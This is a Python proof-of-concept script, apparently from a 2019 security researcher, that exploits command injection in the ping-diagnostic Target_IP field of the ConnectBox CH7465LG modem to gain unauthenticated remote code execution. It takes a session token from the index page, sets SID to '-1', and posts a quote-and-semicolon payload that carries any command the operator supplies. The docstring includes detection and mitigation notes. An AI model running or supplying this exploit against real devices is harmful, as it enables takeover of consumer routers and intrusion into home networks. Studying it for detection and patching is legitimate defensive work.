#!/usr/bin/env python3
"""
poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG).
xitan - 2019 (https://xitan.me).

Request flow, as visible in this script:
  1. GET /index.html without credentials and read the session token from
     the Set-Cookie response header.
  2. POST /xml/setter.xml with that token, the SID cookie forced to '-1',
     and the ping-diagnostic fields (fun=126), with extra text appended to
     the Target_IP field.

Defender notes:
  * Root cause (inferred from the payload shape, not shown here): the
    firmware presumably places Target_IP on a shell command line without
    validating it as a hostname or IP address.
  * Detection: POSTs to /xml/setter.xml carrying fun=126 whose Target_IP
    contains quote or ';' characters, especially with SID=-1.
  * Mitigation: run firmware that validates Target_IP and rejects setter
    requests without an authenticated session; keep the management
    interface unreachable from untrusted networks.
"""

import requests
import sys

# NOTE(review): the usage text names no arguments; the placeholders were
# probably lost when the page was extracted. argv[1] is used as the device
# host and argv[2] as the text appended to Target_IP.
if len(sys.argv) < 3:
    print("./poc-rce.py ")
    exit(1)

device_host = sys.argv[1]
appended_text = sys.argv[2]
base_url = 'http://' + device_host

session = requests.Session()

# Step 1: the unauthenticated index page hands out a session token cookie.
index = session.get(base_url + '/index.html', verify=False)

# The token is the text between the first '=' and the first ';' of the
# Set-Cookie header.
cookie_header = index.headers.get('Set-Cookie')
token_start = cookie_header.find('=') + 1
token_end = cookie_header.find(';')
token = cookie_header[token_start:token_end]

# The request is sent with SID set to '-1', i.e. without a logged-in session.
session.cookies['SID'] = '-1'

# Step 2: ping-diagnostic form fields. Target_IP is the field that carries
# the text appended after the hostname.
data = {
    'token': token,
    'fun': '126',
    'Type': '1',
    'Target_IP': 'google.com"\"; ' + appended_text + ';',
    'Ping_Size': '64',
    'Num_Ping': '5',
    'Ping_Interval': '1'
}

setter = session.post(base_url + '/xml/setter.xml', data=data, verify=False)

# HTTP 200 only shows the request was accepted; the script does not read
# any output back from the device.
if setter.status_code == 200:
    print('[+] Command successfully sent.')